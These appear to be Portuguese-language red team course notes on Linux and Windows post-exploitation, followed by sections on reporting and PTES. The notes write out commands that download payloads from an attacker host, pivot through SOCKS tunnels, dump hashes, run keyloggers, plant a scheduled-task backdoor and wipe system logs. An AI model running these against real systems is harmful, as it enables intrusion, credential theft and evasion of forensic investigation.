Skip to main content

Red Team Operations



Red Team Operations

A Pós-exploração é a fase que sucede o acesso inicial a um sistema comprometido. Nessa etapa, o atacante busca consolidar sua presença, expandir privilégios e obter o máximo de informações e controle possível sobre o ambiente. Isso começa com a melhoria do shell, transformando uma sessão básica e limitada em uma interface interativa mais robusta, que permita uma exploração mais eficaz do sistema.


Depois disso, a escalada de privilégios se torna o foco. Essa prática consiste em identificar falhas de configuração ou permissões indevidas que permitam ao atacante executar comandos com privilégios elevados, muitas vezes como root. Isso pode incluir a exploração de arquivos com permissões SUID, uso indevido de comandos disponíveis via sudo, e busca por arquivos sensíveis que contenham credenciais.


Outro ponto fundamental é a enumeração detalhada do ambiente, identificar processos ativos, usuários logados, serviços em execução, estrutura de rede, versões do sistema e possíveis pontos adicionais de entrada. Com essas informações, o atacante pode planejar movimentos futuros, seja para permanecer no sistema (persistência), exfiltrar dados sensíveis, ou se mover lateralmente para outros dispositivos na rede.


Após conseguir acesso inicial ao sistema, a shell recebida geralmente é bem limitada. Para torná-la mais funcional e interativa, existem algumas técnicas fundamentais. Uma das formas é utilizando Python na máquina alvo para invocar um pseudoterminal com o seguinte comando:

python -c 'import pty; pty.spawn("/bin/bash")'

# Para python3 use:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Depois disso, é necessário exportar o tipo de terminal para melhorar a compatibilidade:

export TERM=xterm

Na sequência, pressiona-se Ctrl + Z para suspender a shell e voltar ao terminal local. No terminal do atacante, executa-se:

stty raw -echo; fg

Esse comando restaura a sessão anterior e, por fim, ajusta o tamanho do terminal para melhor visualização com:

stty rows 38 columns 116

Outra alternativa é o uso do pwncat-cs, que pode ser utilizado para receber um reverse shell com:

pwncat-cs -lp <porta>

Ou para se conectar a um bind shell:

pwncat-cs <ip-da-vítima> <porta>


Escalada de privilégio

A escalada de privilégio em ambientes Linux é uma etapa crítica na pós-exploração. Depois de garantir um shell, o objetivo passa a ser conseguir permissões mais altas, idealmente as de root. Uma técnica comum é buscar por binários com o bit SUID ativado. Esses binários são executados com os privilégios do proprietário, e se esse proprietário for o root, há potencial para abuso. O comando utilizado para localizar esses arquivos é:

find / -perm -u=s -type f 2>/dev/null

Outra verificação essencial é identificar comandos que o usuário atual pode executar com sudo sem precisar de senha. Isso é feito com:

sudo -l

Se houver comandos liberados indevidamente, é possível usá-los para ganhar acesso root.


Também é importante procurar arquivos e diretórios com permissões de escrita para o usuário atual. Se esses arquivos forem sensíveis ou executados com privilégios, há espaço para injeção de comandos. Os comandos usados para isso são:

find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null

A enumeração de processos ativos também é uma boa prática, pois pode revelar serviços desatualizados ou aplicações mal configuradas:

ps auxfww

E por fim, identificar a versão do sistema operacional pode ajudar a correlacionar vulnerabilidades conhecidas:

cat /etc/*-release
cat /etc/issue

Esses métodos permitem uma escalada de privilégios eficiente, aproveitando falhas de configuração ou permissões mal definidas para ampliar o controle sobre o sistema. transferência de arquivos**, se desejar.



Transferência de Arquivos

A transferência de arquivos durante a pós-exploração em sistemas Linux é essencial para carregar ferramentas, scripts ou para extrair dados do sistema comprometido. A forma mais direta de realizar a transferência é utilizando um servidor HTTP simples com Python. Na máquina do atacante, basta executar:

python3 -m http.server 8000

Isso cria um servidor na porta 8000 no diretório atual. No sistema comprometido, o arquivo pode ser baixado usando ferramentas como wget ou curl, se estiverem disponíveis:

wget http://<IP-do-atacante>:8000/nome-do-arquivo

# ou:
curl -O http://<IP-do-atacante>:8000/nome-do-arquivo

Quando essas ferramentas não estão disponíveis, pode-se usar nc (netcat) para transferir arquivos. No atacante:

nc -lvp 4444 < nome-do-arquivo

E no alvo:

nc <IP-do-atacante> 4444 > nome-do-arquivo

Além disso, se houver um serviço SSH ativo e as credenciais forem conhecidas ou obtidas, é possível usar scp para copiar arquivos entre os sistemas. Essas técnicas permitem introduzir ferramentas como scripts de enumeração, payloads, ou até mesmo manter persistência via backdoors, facilitando a continuidade do acesso ao sistema invadido.



Escaneamento automatizado de sistemas

O escaneamento automatizado de sistemas na pós-exploração em Linux é uma etapa fundamental para agilizar a identificação de vulnerabilidades e oportunidades de escalada de privilégios. Em vez de depender apenas de comandos manuais e inspeção visual, o atacante utiliza ferramentas que vasculham o sistema de forma rápida, abrangente e sistemática.


Uma das ferramentas mais utilizadas para esse fim é o LinPEAS (Linux Privilege Escalation Awesome Script). Ele realiza uma varredura completa no sistema, verificando permissões de arquivos, configurações incorretas, serviços com privilégios elevados, informações sensíveis em arquivos e muitos outros pontos que podem ser explorados. O resultado dessa varredura fornece uma visão clara do que pode ser utilizado para escalar privilégios ou manter acesso.


Outra ferramenta é o LES (Linux Exploit Suggester), que tem uma abordagem mais direta, ele coleta dados do sistema, como kernel, arquitetura e distribuição, e cruza com uma base de dados de exploits conhecidos. O objetivo é sugerir quais vulnerabilidades são potencialmente exploráveis naquele ambiente específico.


Essas ferramentas economizam tempo e aumentam a eficácia da análise, principalmente em ambientes mais complexos, e são especialmente úteis quando o atacante precisa agir rapidamente para garantir acesso e expandir sua posição na rede.



Movimentos laterais

Os movimentos laterais referem-se à técnica de, após comprometer uma máquina dentro de uma rede, você expande o acesso para outros dispositivos conectados à mesma infraestrutura. É uma estratégia usada para aumentar o alcance do atacante dentro do ambiente invadido, muitas vezes visando sistemas mais sensíveis ou com permissões mais elevadas.


Uma das principais técnicas é o uso de túneis e redirecionamento de tráfego com ferramentas como rsocx, chisel, ssh com proxy e proxychains4. O rsocx, por exemplo, permite estabelecer um túnel entre uma máquina intermediária comprometida e o atacante, servindo como ponto de pivô. O atacante pode redirecionar o tráfego de uma rede interna, inacessível externamente, para sua própria máquina.


# Na máquina do atacante (Pentester)
./rsocx -t 0.0.0.0:8000 -s 127.0.0.1:1080

## Esse comando diz para escutar em todas as interfaces (0.0.0.0) na porta 8000 e envie o tráfego para o proxy SOCKS local na porta 1080.

# Na máquina intermediária (já comprometida dentro da rede-alvo):
./rsocx -r 192.168.1.14:8000

## Aqui, `192.168.1.14` é o IP da máquina do atacante que está com o `rsocx` escutando.

# Na máquina do atacante:
socks5 127.0.0.1 1080

# Usando o túnel para escanear a rede interna da vítima:
proxychains4 nmap -sT -p 80 -Pn 10.0.121.129

## Esse comando envia um scan TCP (`-sT`) na porta 80 do IP interno `10.0.121.129`, ignorando a detecção de host (`-Pn`), tudo através do túnel com `rsocx`. 
## Isso permite mapear a rede interna da organização como se o atacante estivesse fisicamente dentro dela.

O chisel é uma ferramenta semelhante, que permite criar túneis reversos via SOCKS, tornando possível acessar serviços de rede que só estão disponíveis internamente, como painéis administrativos, bancos de dados ou servidores de arquivos.

./chisel server -p 8001 --reverse

./chisel client 192.168.56.1:8001 R:1080:socks

Já com o proxychains4, é possível redirecionar comandos como nmap, curl ou até o ssh para que passem por um proxy SOCKS previamente estabelecido com chisel ou outro método. Isso permite, por exemplo, escanear portas internas como se estivesse dentro da rede local.

Esse tipo de movimentação é especialmente eficaz quando o atacante compromete uma máquina em uma zona desmilitarizada (DMZ) ou estação de trabalho comum e tenta alcançar servidores críticos ou controladores de domínio.



Pivoting

Pivoting é uma técnica avançada utilizada em pós-exploração que permite ao atacante usar uma máquina já comprometida como ponto de apoio para acessar outras partes da rede interna, que não estariam acessíveis diretamente do exterior. Ou seja, é como transformar a máquina invadida em uma espécie de “ponte” para movimentar-se lateralmente dentro da infraestrutura da vítima.


Isso pode ser feito combinando ferramentas como chisel, rsocx, proxychains4 e ssh com encaminhamento de porta. Por exemplo, com o chisel, o atacante pode configurar um túnel reverso SOCKS entre a máquina comprometida e sua própria. A máquina comprometida se conecta ao servidor do atacante:

./chisel client 192.168.56.1:8001 R:1080:socks

No atacante, o servidor do chisel escuta:

./chisel server -p 8001 --reverse

Esse túnel permite que todo o tráfego roteado por proxychains4 (configurado com socks5 127.0.0.1 1080) seja encaminhado por dentro da máquina comprometida, permitindo escanear ou interagir com alvos internos da rede como se o atacante estivesse fisicamente ali.


Essa técnica é especialmente útil em ambientes segmentados, onde máquinas críticas não têm acesso direto à internet. Ao usar pivoting, o atacante pode atingir essas zonas restritas e aumentar significativamente o impacto do ataque.



Limpeza de rastros

A limpeza de rastros é uma etapa crucial da pós-exploração e tem como objetivo apagar vestígios da presença e das atividades do invasor no sistema comprometido. Isso dificulta ou até impede que administradores e analistas forenses descubram a intrusão ou compreendam o que foi feito.


No Linux, o processo envolve diferentes níveis de ações. Um dos primeiros alvos é o histórico de comandos, que pode ser apagado com:

cat /dev/null > ~/.bash_history

# Ou:
history -a ; history -c

Esse comando esvazia o conteúdo do arquivo onde o bash armazena os comandos digitados. Também é comum apagar arquivos específicos utilizados durante a intrusão com:

rm -rf nome-do-arquivo

Para uma limpeza mais ampla, é possível remover logs do sistema. Os logs ficam geralmente em /var/log e possuem várias extensões como .log, .gz, .old, .xz, .1. Um comando para apagar todos esses tipos de arquivos seria:

find /var/log \( -iname "*.log" -o -iname "*.gz" -o -iname "*.old" -o -iname "*.xz" -o -iname "*.1" \) -delete

Além disso, se houver sido criado um backdoor via crontab, ele também precisa ser removido para evitar persistência:

crontab -e

E então excluir manualmente as linhas maliciosas.


Essas ações fazem parte de uma estratégia para deixar o mínimo de rastros possível, mantendo o ataque invisível e prolongando o acesso não autorizado, ou ao menos dificultando a resposta.



Pós-exploração Windows

A pós-exploração em ambientes Windows segue os mesmos objetivos gerais do Linux, expandir o acesso, escalar privilégios, exfiltrar dados e garantir persistência, mas com ferramentas e técnicas adaptadas à arquitetura do sistema da Microsoft.


Logo após o acesso inicial, o atacante precisa fazer uma boa enumeração. Isso inclui identificar usuários, grupos, permissões, processos em execução, configurações de rede e sistema. Comandos como whoami, net user, net localgroup, ipconfig /all, tasklist /SVC e netstat -ano são usados para mapear o ambiente e encontrar possíveis vetores de escalada de privilégios.


Na escalada de privilégios, é comum verificar permissões do usuário com accesschk, buscar senhas salvas em arquivos (findstr /si password *.txt *.config) ou explorar tarefas agendadas e serviços vulneráveis. Também se inspecionam os níveis de patching com wmic qfe get e as aplicações instaladas com wmic product get.


Para transferência de arquivos, há várias opções, montar compartilhamentos SMB com impacket-smbserver, usar certutil ou powershell para baixar arquivos via HTTP, ou até configurar um servidor FTP com pyftpdlib.


Movimentação lateral é realizada com ferramentas como chisel, criando túneis SOCKS que permitem escanear ou invadir outras máquinas da rede interna com proxychains. O atacante também pode usar RDP, WinRM ou PsExec se tiver credenciais.


Persistência pode ser feita criando tarefas agendadas (schtasks) que executam backdoors periodicamente. Já a limpeza de rastros envolve apagar arquivos temporários, históricos de comandos (Clear-History no PowerShell), e logs com wevtutil el.


A combinação dessas técnicas permite ao atacante consolidar seu controle sobre o ambiente Windows e se mover com mais profundidade e discrição dentro da infraestrutura comprometida.



Transferência de arquivos

No contexto de pós-exploração em Windows, a transferência de arquivos é essencial para carregar ferramentas adicionais ou exfiltrar dados. O material descreve três métodos principais para isso: SMB, HTTP e FTP.


No caso do SMB, é possível criar um servidor de compartilhamento na máquina do atacante usando o impacket-smbserver:

impacket-smbserver smb $(pwd) -smb2support -user kali -password 123456

Na máquina comprometida, o atacante pode mapear essa unidade usando PowerShell ou comandos COM:

$net = new-object -ComObject WScript.Network
$net.MapNetworkDrive("u:", "\\192.168.15.16\smb", $false, "kali", "123456")

Ou, com credenciais em formato seguro:

$pass = ConvertTo-SecureString '123456' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('kali', $pass)
New-PSDrive -Name "smb" -PSProvider "FileSystem" -Root "\\192.168.15.16\smb" -Credential $cred

Com HTTP, o atacante pode usar um servidor Python para disponibilizar arquivos:

python3 -m http.server 80

E na máquina Windows, baixar com:

certutil.exe -urlcache -f http://192.168.15.16/arquivo.txt arquivo.txt

# ou:

powershell.exe wget http://192.168.15.16/arquivo.txt -OutFile arquivo.txt

Para FTP, o atacante pode iniciar um servidor com:

python -m pyftpdlib -p 21 --write

E no cliente Windows usar o modo interativo (ftp) ou um script com comandos armazenados em ftp.txt e executados com:

ftp -v -n -s:ftp.txt

Esses métodos oferecem flexibilidade dependendo do que está disponível no sistema comprometido e nas restrições da rede.



Escalação de privilégio

A escalada de privilégio em ambientes Windows, começa com uma enumeração completa do sistema, pois a identificação de permissões mal configuradas, serviços vulneráveis e dados sensíveis é o caminho para alcançar acesso com privilégios elevados, como o de administrador ou SYSTEM.


Primeiramente, o atacante coleta informações básicas do sistema com:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

Para descobrir os usuários e grupos existentes:

whoami
net user
net localgroup

Em seguida, é feita a análise da rede com:

ipconfig /all
route print
netstat -ano

E verificação dos processos e serviços ativos:

tasklist /SVC

Com isso, o atacante pode detectar softwares desatualizados, serviços mal configurados ou acessos administrativos indevidos. A verificação de permissões também é essencial, e pode ser feita com accesschk:

accesschk.exe "Everyone" "C:"

Outra técnica é procurar por arquivos de configuração contendo senhas:

findstr /si password *.conf *.txt *.config *.ini

A enumeração de tarefas agendadas e regras de firewall pode revelar comandos executados com privilégio elevado:

schtasks /query /fo LIST /v
netsh advfirewall firewall show rule name=all

Além disso, a inspeção de binários com flag AutoElevate e drivers pode indicar oportunidades de exploração:

reg query HKEY_CURRENT_USER\...\Installer
wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn

Para automação, são usadas ferramentas como:

  • Windows Privesc Check

    windows-privesc-check2.exe -t --dump

  • Metasploit
    Com módulos como getsystem, getprivs, hashdump e coleta de credenciais (post/windows/gather/credentials/credential_collector). Esse módulos podem ser executados após obter uma sessão de controle sobre a máquina (normalmente uma sessão do tipo Meterpreter).

  • getsystem
    Tenta automaticamente escalar os privilégios da sessão atual para NT AUTHORITY\SYSTEM, que é o nível mais alto de privilégio no Windows. Ele tenta explorar várias vulnerabilidades ou configurações incorretas conhecidas para isso.

  • getprivs
    Exibe todos os privilégios que o usuário atual possui. Isso ajuda a entender até onde você pode ir com a conta comprometida, como se pode carregar drivers, depurar outros processos, etc.

  • hashdump
    Extrai os hashes das senhas dos usuários armazenadas no SAM (Security Account Manager). Com esses hashes, é possível realizar ataques offline, como cracking de senha com ferramentas como Hashcat ou John the Ripper.

  • keyscan_start e keyscan_dump
    Juntos, funcionam como um keylogger. O primeiro inicia a captura das teclas digitadas pelo usuário e o segundo exibe o que foi capturado.

  • post/windows/gather/credentials/credential_collector
    É um módulo que coleta automaticamente diversas credenciais armazenadas no sistema, incluindo senhas de sessões, senhas em texto claro na memória, credenciais de rede e outras informações sensíveis.


Essas abordagens ajudam a identificar rapidamente falhas e oportunidades de escalada, seja por configuração indevida, falhas de segurança ou exploração direta de serviços e aplicações vulneráveis.



Movimento lateral

O movimento lateral em ambientes Windows refere-se à capacidade do atacante de, após comprometer uma máquina, se deslocar para outras dentro da mesma rede interna. Isso permite ampliar sua presença, atingir alvos mais valiosos e aumentar o impacto do ataque.


O processo funciona assim:

  • No atacante (Linux)
    O atacante roda o Chisel como servidor:

    ./chisel server -p 8001 --reverse

    Isso abre uma porta de escuta (8001) para conexões reversas.

  • Na vítima (Windows)
    A máquina comprometida executa o Chisel como cliente, conectando-se ao servidor e criando um túnel SOCKS:

    .\chisel.exe client 192.168.15.16:8001 R:1080:socks

    Aqui, 192.168.15.16 é o IP do atacante. O tráfego que passar pela porta 1080 será encaminhado via túnel.

  • Configurando o proxychains
    No Linux, edita-se o arquivo /etc/proxychains.conf e adiciona-se a linha:

    socks5 127.0.0.1 1080

    Isso configura o uso do túnel para redirecionar ferramentas de rede.

  • Executando comandos via túnel
    Com o túnel funcionando, o atacante pode usar o proxychains para escanear outras máquinas da rede interna da vítima, por exemplo:

    proxychains nmap -sT -Pn -p 445 10.0.0.10

Além do Chisel, também se pode usar WinRM, PsExec, ou RDP se houver credenciais e permissões adequadas. O movimento lateral é um passo-chave para acessar controladores de domínio, servidores de arquivos ou bases de dados corporativas, aprofundando o acesso dentro da infraestrutura da organização.



Backdoor

Em pós-exploração no Windows, um backdoor é um mecanismo instalado pelo atacante para manter acesso persistente ao sistema mesmo após reinicializações ou tentativas de limpeza. O objetivo é garantir que, mesmo que a sessão atual seja encerrada ou a vulnerabilidade inicial seja corrigida, o atacante ainda consiga voltar ao sistema sem precisar comprometer novamente.


O atacante cria uma tarefa que executa periodicamente um arquivo malicioso:

schtasks /create /sc minute /mo 1 /tn "SystemRU" /tr C:\users\shadow\tools\persistencia.exe /ru "shadow"

Essa linha agenda a execução do programa persistencia.exe a cada minuto, como se fosse uma tarefa do sistema. Mesmo que o sistema reinicie, o Windows continuará executando essa tarefa, garantindo o retorno do acesso ao atacante.


Esse tipo de backdoor pode ser usado para abrir portas, iniciar um reverse shell, reconectar automaticamente a um servidor de comando e controle, ou simplesmente relançar malware. É uma técnica comum e eficaz, especialmente quando combinada com outras medidas de ocultação, como nomes de tarefas semelhantes às do sistema ou instalação em diretórios menos monitorados.


O backdoor, portanto, transforma uma invasão temporária em uma presença duradoura, dificultando a remoção completa do atacante do ambiente comprometido.



Limpando rastros

A limpeza de rastros em pós-exploração no Windows é uma prática essencial para dificultar a detecção da intrusão e atrasar ou impedir a resposta da equipe de segurança. O objetivo é remover evidências das ações realizadas, como comandos executados, arquivos transferidos, programas instalados e alterações feitas no sistema.


Um dos primeiros passos é apagar diretórios ou arquivos criados durante o ataque:

rmdir /s <diretorio>

Esse comando remove recursivamente todo o conteúdo do diretório especificado.


Se o atacante tiver configurado um backdoor com o agendador de tarefas, também é necessário removê-lo:

schtasks /delete /tn ContextSwitchTask /f

Esse comando exclui uma tarefa agendada chamada ContextSwitchTask de forma forçada, sem confirmação.


Para eliminar registros de eventos, que guardam logs detalhados do sistema e podem conter informações valiosas para análise forense, o comando utilizado é:

wevtutil el

O comando acima lista todos os logs do sistema. Para apagar logs específicos, o atacante pode usar:

wevtutil cl <nome-do-log>

Por exemplo:

wevtutil cl Security
wevtutil cl System

Esses comandos limpam os logs dos eventos de segurança e do sistema, respectivamente.


Essas ações não garantem anonimato completo, mas dificultam bastante a reconstrução dos passos do invasor, principalmente em sistemas que não possuem soluções de monitoramento avançadas ou backups dos logs.



Transferência de arquivos

A transferência de arquivos durante a pós-exploração em ambientes Windows é fundamental para o atacante conseguir enviar ferramentas maliciosas, scripts de automação ou extrair dados da máquina comprometida.


Com SMB, o atacante usa o impacket-smbserver para disponibilizar arquivos via compartilhamento de rede:

impacket-smbserver smb $(pwd) -smb2support -user kali -password 123456

Na máquina Windows, é possível mapear a unidade de rede com PowerShell:

$pass = ConvertTo-SecureString '123456' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('kali', $pass)
New-PSDrive -Name "smb" -PSProvider "FileSystem" -Root "\\192.168.15.16\smb" -Credential $cred

Via HTTP, o atacante levanta um servidor com Python:

python3 -m http.server 80

E na máquina da vítima, baixa o arquivo com:

certutil.exe -urlcache -f http://192.168.15.16/arquivo.txt arquivo.txt

# ou:
powershell.exe wget http://192.168.15.16/arquivo.txt -OutFile arquivo.txt

Com FTP, o atacante usa:

python -m pyftpdlib -p 21 --write

E no Windows, executa:

ftp 192.168.15.16

Ou cria um script com os comandos:

echo "open 192.168.15.16" >> ftp.txt
echo "USER anonymous" >> ftp.txt
echo "PASS anonymous" >> ftp.txt
echo "bin" >> ftp.txt
echo "get arquivo.txt" >> ftp.txt
echo "bye" >> ftp.txt
ftp -v -n -s:ftp.txt

https://on.fiap.com.br/mod/conteudospdf/view.php?c=13099&id=480525 pag 15



Escalada de privilégio automatizada

A escalada de privilégio automatizada no Windows tem como foco acelerar a identificação de falhas e oportunidades de elevação de privilégios, usando ferramentas que fazem a varredura completa do sistema e apontam diretamente o que pode ser explorado.

Existem duas abordagens principais:

  1. Windows Privesc Check

    Essa ferramenta é executada diretamente na máquina comprometida e analisa configurações de permissões, serviços, tarefas agendadas, registros e arquivos acessíveis com potencial de abuso. O comando de execução é:

    windows-privesc-check2.exe -t --dump

    Ela gera uma análise detalhada, exibindo pontos de escalada, como permissões incorretas em serviços, usuários com acesso desnecessário a arquivos críticos, e tarefas que podem ser manipuladas para execução com privilégios de sistema.

  2. Metasploit

    Dentro de uma sessão meterpreter, você pode usar módulos pós-exploração para escalar privilégios automaticamente:

    • getsystem: tenta explorar métodos locais para obter acesso como SYSTEM.
    • getprivs: lista todos os privilégios disponíveis da conta atual.
    • post/windows/gather/credentials/credential_collector: coleta credenciais salvas.
    • hashdump: extrai os hashes das senhas do SAM.
    • keyscan_start / keyscan_dump: inicia e exibe um keylogger.

Essas ferramentas cruzam dados de permissões, serviços e configurações para identificar, de forma automatizada, vulnerabilidades que o atacante poderia levar horas para detectar manualmente. São particularmente úteis quando o acesso é restrito e o tempo de ação é limitado.


O WinPEAS (Windows Privilege Escalation Awesome Script) é uma ferramenta automatizada voltada para escalada de privilégios em ambientes Windows. Ela faz uma varredura completa do sistema comprometido, reunindo e analisando informações críticas que podem indicar oportunidades para o atacante obter acesso administrativo ou SYSTEM.


É uma ferramenta poderosa justamente porque centraliza essa coleta em um único script, evitando a necessidade de dezenas de comandos manuais. Pode ser executada diretamente no terminal da vítima, após o upload do binário, com:

# Baixar:
powershell "IEX(New-Object Net.webClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/refs/heads/master/winPEAS/winPEASps1/winPEAS.ps1')"
winpeas.exe

Ela apresenta os resultados em destaque, geralmente com cores e indicadores visuais, facilitando a identificação do que pode ser explorado. É uma escolha comum em avaliações de segurança ofensiva por sua eficácia, rapidez e profundidade de análise.



Reporting

O Reporting em Red Team Operations trata da elaboração de relatórios após a execução de atividades ofensivas, com foco em apresentar os resultados de maneira clara, objetiva e útil para os clientes ou responsáveis técnicos da organização avaliada.


O conteúdo destaca que o relatório de Red Team não é apenas uma lista de vulnerabilidades, mas um documento que contextualiza as ações, mostra o impacto real dos acessos obtidos, e orienta a resposta e correção. Ele precisa ser técnico e executivo ao mesmo tempo, ou seja, apresentar detalhes suficientes para os profissionais de segurança e ao mesmo tempo fornecer uma narrativa compreensível para a gestão.


O relatório deve ser estruturado em seções como escopo, objetivos, metodologia, linha do tempo das ações, evidências dos acessos obtidos, credenciais extraídas, movimentos laterais, escalação de privilégios, persistência, exfiltração de dados e, principalmente, recomendações claras de mitigação.


A ênfase está em construir um documento que traduza as ações técnicas em consequências práticas e mensuráveis, ajudando a organização a entender os riscos reais, priorizar correções e melhorar sua postura de segurança como um todo. Também é mencionado o uso de ferramentas para padronizar e automatizar a geração de evidências e artefatos para o relatório final.



Penetration Testing Execution Standard - PTES

O PTES (Penetration Testing Execution Standard) é um framework que define um conjunto de boas práticas, fases e objetivos para condução de testes de intrusão. Ele foi criado por profissionais da área como um padrão aberto e colaborativo, com o objetivo de tornar os processos de pentest mais estruturados, consistentes e úteis para as organizações.


O PTES é utilizado como referência para garantir que o relatório final aborde todos os aspectos relevantes de um teste de intrusão bem executado. O PTES organiza o teste em sete fases:

  1. Pre-engagement Interactions: definição de escopo, objetivos, regras de engajamento e limitações.
  2. Inteligência (Intelligence Gathering): coleta de informações sobre o alvo.
  3. Ameaças de Modelagem (Threat Modeling): análise dos ativos e possíveis vetores de ataque.
  4. Análise de Vulnerabilidades (Vulnerability Analysis): identificação de falhas exploráveis.
  5. Exploração (Exploitation): uso prático das vulnerabilidades para obter acesso.
  6. Pós-exploração (Post-Exploitation): escalada de privilégios, movimentação lateral, persistência e coleta de dados.
  7. Relatório (Reporting): documentação de todo o processo, resultados e recomendações.

A fase de reporting no PTES não é apenas uma formalidade, mas sim um produto crítico do trabalho ofensivo. Ela deve conter não só o que foi feito, mas o porquê, com evidências e recomendações claras para mitigar os riscos descobertos. Adotar o PTES dá legitimidade técnica e metodológica ao trabalho, e garante que o relatório seja bem recebido e compreendido tanto por equipes técnicas quanto por gestores.



Sumário Executivo

Esta parte do relatório tem como objetivo apresentar ao leitor os propósitos centrais do Teste de Intrusão e destacar os principais resultados obtidos. É voltada para pessoas que atuam em cargos de supervisão ou que têm uma visão estratégica da segurança da informação na empresa, mas também interessa a integrantes de áreas impactadas pelas ameaças identificadas ou validadas no teste. O conteúdo a seguir abrange os seguintes pontos:


  • Background O objetivo desta subseção é explicar com clareza a motivação do teste. Devem ser incluídos os dados definidos na fase de Pré-Engajamento, como os riscos que se pretendia avaliar, as medidas de proteção existentes e os alvos estabelecidos. A ideia é conectar os propósitos definidos inicialmente com os resultados práticos alcançados.

  • Postura Geral Aqui se descreve, de forma narrativa, o quanto o ambiente avaliado se mostrou resistente ou exposto às ações realizadas. São discutidos problemas de base, como falhas em processos de atualização, e também falhas pontuais, como a ausência de uma correção crítica em um sistema específico. Essa análise também deve indicar se foi possível acessar informações sensíveis e quais seriam os impactos práticos disso para a organização.

  • Perfil e Nível de Risco Nessa parte, é definida a pontuação de risco geral do ambiente. Durante o planejamento, o time avaliador já indica qual modelo de classificação será adotado, podendo combinar abordagens como FAIR e DREAD. Com base nisso, calcula-se uma nota final que traduz o nível de risco em termos claros. Por exemplo, a empresa foi classificada com um risco geral de 7 (em 10), o que representa uma probabilidade significativa de comprometimento com potencial de perdas financeiras importantes. Essa nota leva em conta uma falha crítica, diversas falhas médias e a comprovação de um ataque direcionado bem-sucedido.

  • Resumo das Descobertas Este trecho apresenta uma visão condensada e visual das vulnerabilidades encontradas, com base em dados estatísticos. Gráficos e tabelas mostram os alvos testados, resultados alcançados, métodos usados, percentuais de sucesso e outras métricas que foram combinadas no início do projeto. Além disso, são apresentadas as causas mais recorrentes das falhas exploradas, facilitando a compreensão do cenário geral.

  • Resumo de recomendações Aqui são descritas as ações necessárias para tratar os riscos descobertos. A proposta é mostrar não apenas o que deve ser feito, mas também qual o grau de esforço envolvido e como as medidas foram priorizadas. Essa priorização deve ser baseada em critérios bem definidos, levando em conta risco, impacto e viabilidade.

  • Plano de Ação Estratégico Por fim, esta seção organiza as correções em uma sequência lógica e alinhada aos objetivos do negócio. Os itens são distribuídos em prazos e metas mensuráveis, permitindo que a empresa siga um roteiro concreto de melhoria. A ideia é transformar as recomendações em ações com prazo, responsáveis e critérios de sucesso bem definidos.


Relatório Técnico

Esta parte do relatório apresenta uma descrição técnica completa do exercício de Red Team, cobrindo todos os aspectos e elementos definidos como metas durante a etapa de planejamento. O relatório técnico traz uma visão aprofundada sobre o escopo da atividade, os dados utilizados, o caminho seguido pelos ataques, os efeitos causados e, ao final, as sugestões de correção com base no que foi observado.


  • Introdução A introdução do relatório técnico serve como um ponto de partida, reunindo os principais dados operacionais do exercício. Aqui devem estar listados os profissionais que participaram do teste — tanto do lado do cliente quanto da equipe ofensiva —, as informações de contato relevantes, os sistemas e ativos que foram alvo, os objetivos e limites do trabalho, o nível de agressividade adotado no teste, a metodologia aplicada e o modelo de análise de riscos utilizado. Esta seção funciona como um registro oficial da estrutura do teste e dos elementos técnicos envolvidos.

  • Coleta de Informações Essa etapa é fundamental para o sucesso do teste, pois quanto mais dados o time ofensivo consegue reunir, mais precisos e direcionados serão os ataques. O relatório detalha essa fase dividindo-a em quatro categorias principais:

  • Informação Passiva Refere-se aos dados obtidos sem qualquer interação direta com os sistemas do cliente. Isso inclui, por exemplo, buscas em motores como o Google, análise de registros DNS, consulta a domínios públicos e levantamento de informações sobre a infraestrutura e endereços IP da organização. O foco é entender o ambiente sem gerar tráfego que possa alertar os defensores.

  • Informação Ativa Aqui são listadas as atividades que envolvem comunicação direta com os ativos da empresa, como escaneamento de portas, identificação de serviços e análise da arquitetura da rede. Esse tipo de atividade já implica interação com os sistemas e tem como objetivo mapear pontos de entrada e entender como a estrutura está organizada.

  • Informação Corporativa Esta parte descreve o contexto de negócio da organização. São mapeadas informações como a divisão em áreas internas, o mercado em que atua, os serviços prestados e a forma como os sistemas testados se relacionam com esses processos. Isso ajuda a contextualizar o valor dos ativos e o impacto de um eventual comprometimento.

  • Informação de Usuários Por fim, são apresentados dados sobre pessoas vinculadas à organização, coletados durante a fase de reconhecimento. Isso inclui nomes, e-mails, cargos, relações hierárquicas e outras informações extraídas de fontes públicas ou expostas em sistemas. Também são explicadas as técnicas usadas para obter esses dados, como análise de repositórios, vazamentos e redes sociais.



Avaliação de Vulnerabilidades

Esta parte do relatório trata da detecção sistemática de falhas existentes no ambiente analisado, junto com a avaliação do risco que cada uma dessas falhas representa. O foco aqui é descrever detalhadamente os métodos usados para descobrir as vulnerabilidades, apresentar evidências concretas e atribuir uma classificação a cada uma conforme seu impacto e contexto.


A avaliação é dividida em dois grandes grupos:

  • Vulnerabilidades Técnicas

    São aquelas relacionadas diretamente às camadas do modelo OSI, como falhas em protocolos, serviços expostos, configurações incorretas de rede, entre outras. Elas podem ser detectadas por ferramentas automatizadas de varredura ou por análise manual da equipe. Essa categoria também leva em conta o quanto a vulnerabilidade está exposta ao ambiente externo, ou seja, se pode ser explorada remotamente ou exige acesso interno.

  • Vulnerabilidades Lógicas

    Neste grupo entram os problemas que não estão ligados diretamente a aspectos técnicos da infraestrutura, mas sim à lógica de funcionamento de sistemas, permissões, autenticação, fluxos de processo, ou decisões de segurança mal planejadas. A descrição inclui a classificação da falha, o local exato onde foi encontrada, o método usado para identificá-la e uma estimativa do nível de exposição.


Por fim, essa seção encerra com um resumo consolidado das descobertas, apresentando um panorama geral das vulnerabilidades identificadas, suas classificações, quantidade e possíveis implicações para a organização. Esse resumo ajuda a visualizar o impacto agregado e serve como ponte para as recomendações que virão a seguir.



Exploração/Confirmação de Vulnerabilidade

Essa parte do relatório descreve o processo de ativação das vulnerabilidades descobertas anteriormente, com o objetivo de comprovar sua existência e mensurar o nível de acesso que podem proporcionar. Aqui serão apresentados todos os passos adotados para confirmar cada falha, o cronograma das tentativas, os sistemas-alvo escolhidos e as ações realizadas durante o processo de exploração.


A exploração pode ser dividida em duas frentes principais:

  • Ataques Diretos

